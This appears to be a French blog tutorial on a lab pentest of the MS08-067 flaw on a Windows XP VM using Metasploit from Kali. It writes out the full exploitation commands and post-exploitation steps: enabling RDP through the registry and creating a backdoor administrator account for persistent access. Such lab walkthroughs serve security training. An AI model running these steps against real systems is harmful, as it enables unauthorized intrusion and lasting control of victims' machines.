Expérience de pentest sur la vulnérabilité MS08-067 avec Metasploit

Configuration de l'environnement

Pour cette démonstration, nous utilisons deux machines virtuelles :

  • Windows XP SP3 avec l'adresse IP 192.168.1.100, servant de cible.
  • Kali Linux (version récente) avec l'adresse IP 192.168.1.101, utilisée comme système d'attaque.

Les fichiers ISO nécessaires pour la machine cible peuvent être obtenus via des sources standard comme les dépôts de sécurité.

Fonctionnement de la vulnérabilité MS08-067

Cette faille critique affecte le service RPC de Windows, permettant une exécution de code à distance sans authentification. Elle touche spécifiquement les systèmes Windows 2000, XP et Server 2003, et a été largement exploitée par des vers informatiques. Une configuration réseau sécurisée avec pare-feu peut réduire les risques da'ttaque depuis l'extérieur.

Préparation de Metasploit sur Kali Linux

Dans les versions modernes de Kali, la base de données Metasploit nécessite une initialisation manuelle. Voici les étapes à suivre :


# Démarrer le service PostgreSQL
systemctl start postgresql

# Initialiser la base de données pour Metasploit
msfdb init

# Lancer la console Metasploit
msfconsole

# Vérifier la connexion à la base de données
db_status

Pour rendre le service persistant après un redémarrage, activez-le avec systemctl enable postgresql.

Exploitation de la vulnérabilité

Après avoir lancé msfconsole, recherchez le module d'exploittaion correspondant :


search MS08-067

Sélectionnez le module d'exploitation identifié :


use exploit/windows/smb/ms08_067_netapi

Affichez les options disponibles avec show options. Configurez les paramètres essentiels :


# Définir l'adresse IP de la cible
set RHOST 192.168.1.100

# Spécifier la version du système cible (par exemple, 34 pour Windows XP SP3 chinois)
set TARGET 34

Lancez l'attaque avec la commande exploit. Si elle réussit, une session Meterpreter est ouverte.

Actions post-exploitation

Avec l'accès Meterpreter, activez le bureau à distance pour un contrôle graphique :


# Activer RDP via le script intégré
run getgui -e

Alternativement, modifiez le registre Windows manuellement via une invite de commandes shell :


REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Vérifiez que le port 3389 est bien en écoute :


netstat -ano | findstr 3389

Pour maintenir l'accès, créez un nouvel utilisateur administrateur :


# Ajouter un compte utilisateur
net user newadmin SecurePass! /add

# Élever les privilèges
net localgroup administrators newadmin /add

Enfin, connectez-vous à distance depuis Kali en utilisant ce compte :


rdesktop -a 32 -u newadmin -p "SecurePass!" 192.168.1.100:3389

Étiquettes: MS08-067 WindowsXP KaliLinux metasploit PostgreSQL

Publié le 7 juillet à 23h10